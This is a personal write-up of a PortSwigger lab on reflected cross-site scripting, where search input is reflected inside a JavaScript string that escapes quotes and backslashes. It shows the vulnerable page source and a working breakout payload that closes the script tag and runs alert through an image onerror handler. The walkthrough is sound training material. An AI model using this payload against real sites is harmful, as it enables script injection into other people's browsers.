Reflected XSS into a JavaScript string with single quote and backslash escaped | Jan 1, 2023

Introduction

Welcome to my another writeup! In this Portswigger Labs lab, you’ll learn: Reflected XSS into a JavaScript string with single quote and backslash escaped! Without further ado, let’s dive in.

• Overall difficulty for me (From 1-10 stars): ★★☆☆☆☆☆☆☆☆

Background

This lab contains a reflected cross-site scripting vulnerability in the search query tracking functionality. The reflection occurs inside a JavaScript string with single quotes and backslashes escaped.

To solve this lab, perform a cross-site scripting attack that breaks out of the JavaScript string and calls the alert function.

Exploitation

Home page:

In here, we can see there is a search box.

Let’s try to search something:

As you can see, our input is reflected to the web page.

View source page:

<section class=search>
    <form action=/ method=GET>
        <input type=text placeholder='Search the blog...' name=search>
        <button type=submit class=button>Search</button>
    </form>
</section>
<script>
    var searchTerms = 'test';
    document.write('<img src="/resources/images/tracker.gif?searchTerms='+encodeURIComponent(searchTerms)+'">');
</script>

In here, the searchTerms is inside the document.write JavaScript function’s string.

Let’s try to escape it:

>'+'<script>alert(document.domain)</script>'

However, it escaped ".

How about \?

Same.

Which means we need to use event handlers:

</script><img src=errorpls onerror=alert(document.domain)>

Hence the application’s JavaScript will be:

<script>
    var searchTerms = 'test';
    document.write('<img src="/resources/images/tracker.gif?searchTerms='</script><img src=errorpls onerror=alert(document.domain)>

Let’s try it:

Nice!

What we’ve learned:

1. Reflected XSS into a JavaScript string with single quote and backslash escaped